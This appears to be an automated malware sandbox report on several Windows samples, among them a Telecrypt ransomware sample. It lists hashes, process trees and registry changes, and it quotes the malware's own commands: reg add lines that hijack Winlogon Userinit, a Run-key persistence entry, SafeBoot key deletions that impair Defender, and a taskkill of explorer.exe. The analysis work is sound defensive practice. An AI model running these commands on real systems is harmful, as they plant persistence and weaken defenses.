C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bb6006dc311e7aa7d95cf3a7c41c27b9
SHA1 0b0017cce366ef578778409b685de4e50571390b
SHA256 fbb0043e7a50b0d48181c5b6a5a0a112f3dd097dc3f90b6b13a1993df964ee4e
SHA512 0fd99e4d1c13366c59dac33a20158219d2c0da98c9901c1f5a2866cc0d87b5c1934b3d7103c475473469b5a4b36e780fed54280c7ba7cca0bcbfda475ca89191

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0286e564040af901354aba89d4c1dd0b
SHA1 6e187aebd9b5117fdee85c71c979a3d83dcb3e1e
SHA256 68b901f760e313893ee5ed5cbc121a5c9542f2d259b749728458e4d32cefbc2a
SHA512 63873dbeb25e9fcb3714a7176d8a86d919f4420f09d6b4e0fa08fb6cee24748d46b3f1d1083aab4fbbb2f2e07af1b7f2c0b77b3b336dbf1c6aa53bf5013891fc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1e29cff10fe359626897328a7d1b0151
SHA1 5830ea679eff816e78f30301235811aa69886ce4
SHA256 7c60eac401001ae7c17a44e1b8bbbad42318f35536fede1d80608ce19d562fd6
SHA512 2d933df3c68c2417ddcc9d0ff7be5d01eb12a26cc0c177e54312aa486a1dbf72f9d6ed9286ac5dbcbba1bddeba1e022d7227f3be2cc64d3e37e4f9dfd5412ac3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fd95b936fa24e519ac4a4000b0d2e7aa
SHA1 c539ca0e9e086799ef31eed123620e3e1263989a
SHA256 ccba8ac5a4ce7e77519ecc5f628f53f64e26e3f01af11730b024da531b9c99a6
SHA512 1be5355f6b6591c4c7c4f08f6cfea2f266a77e5b1bcd3f0147b64fa73b75a63993999c2800e76ff7f55c838a9a782c6656e668160a2ac63a691d98691954d195

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a4335136f2af04dbdbb7be754caa16c1
SHA1 78c7fa08aecdc599d92a7a6f0ec75358b56fe721
SHA256 e668c6433c5135d9c68a7323c64ce57f6293c4b04d3e41b65d0e3a3564f2ca81
SHA512 b627272c578b906486ff542cba3e343f7f7eca9c77a01bafbc356104b957e8a89e21cbacccfc391e1b1743e7c63b9430174b12947f2b2d809e0f54cdcbf46936

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tordll.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2516 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tordll.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tordll.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

291s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\unpack.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\unpack.exe" C:\Users\Admin\AppData\Local\Temp\unpack.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend C:\Users\Admin\AppData\Local\Temp\unpack.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc C:\Users\Admin\AppData\Local\Temp\unpack.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power C:\Users\Admin\AppData\Local\Temp\unpack.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\unpack.exe" C:\Users\Admin\AppData\Local\Temp\unpack.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\unpack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\unpack.exe C:\Windows\SysWOW64\taskkill.exe
PID 2384 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\unpack.exe C:\Windows\SysWOW64\taskkill.exe
PID 2384 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\unpack.exe C:\Windows\SysWOW64\taskkill.exe
PID 2384 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\unpack.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\unpack.exe

"C:\Users\Admin\AppData\Local\Temp\unpack.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

Network

N/A

Files

memory/2384-0-0x0000000000400000-0x0000000000422000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240729-en

Max time kernel

300s

Max time network

240s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "userinit.exe,\"C:\\\\16519.exe\" 89681039647" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "userinit.exe,\"C:\\\\16519.exe\" 89681039647" C:\Windows\SysWOW64\reg.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2116 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
PID 2116 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
PID 2116 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
PID 2116 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
PID 2116 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
PID 2116 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
PID 2116 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe
PID 2992 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
PID 2992 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
PID 2992 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
PID 2992 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
PID 2992 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
PID 2992 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
PID 2992 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe
PID 2860 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe C:\Windows\SysWOW64\cmd.exe
PID 2968 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2968 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2968 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2968 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2968 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2968 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2968 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2680 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2680 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2680 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2680 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2680 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2680 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2680 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe

"C:\Users\Admin\AppData\Local\Temp\TeenTube_90767.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe" -pass -s2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f /reg:64

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "userinit.exe","\"C:\\16519.exe\" 89681039647" /f /reg:64

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\RarSFX0\s.exe

MD5 a26b0b3948676b82c4796c169bd043eb
SHA1 2e464f6f61b42871c1bf42d84f30ff58d7eef784
SHA256 57d514bdcf2d47f04adf993b682bab6b9dfd150d47f3fef05541106096e6e4e5
SHA512 aa71dc61929eb477ac64153a658bad2ddc6c003989587c42abdb8d4219512a1aaa8793f66247b868b2d92722e4bd01895c084b4a219272c0f6745a55a6d0f162

\Users\Admin\AppData\Local\Temp\RarSFX0\KMPlayer.exe

MD5 f052a9fa8b537c241287b4dca3c11a37
SHA1 295eb1eeabb085e516ede2c625b5a08e9da62430
SHA256 881a394fab156cf1d585be408aa34c979e99a1d74f3a0729c54f982cb845cd82
SHA512 6120f0e194b2222e0a444e412b0f4d3543836f13ae0656f1a69ec61970467104e90348f836dbb6394e74b3351d00d87f3101688e011de842d71fb8ed305aee6a

memory/2992-32-0x0000000002430000-0x0000000002458000-memory.dmp

memory/2992-31-0x0000000002430000-0x0000000002458000-memory.dmp

memory/2992-30-0x0000000002430000-0x0000000002458000-memory.dmp

memory/2992-29-0x0000000002430000-0x0000000002458000-memory.dmp

memory/2860-34-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2860-37-0x0000000000400000-0x0000000000428000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20241010-en

Max time kernel

300s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
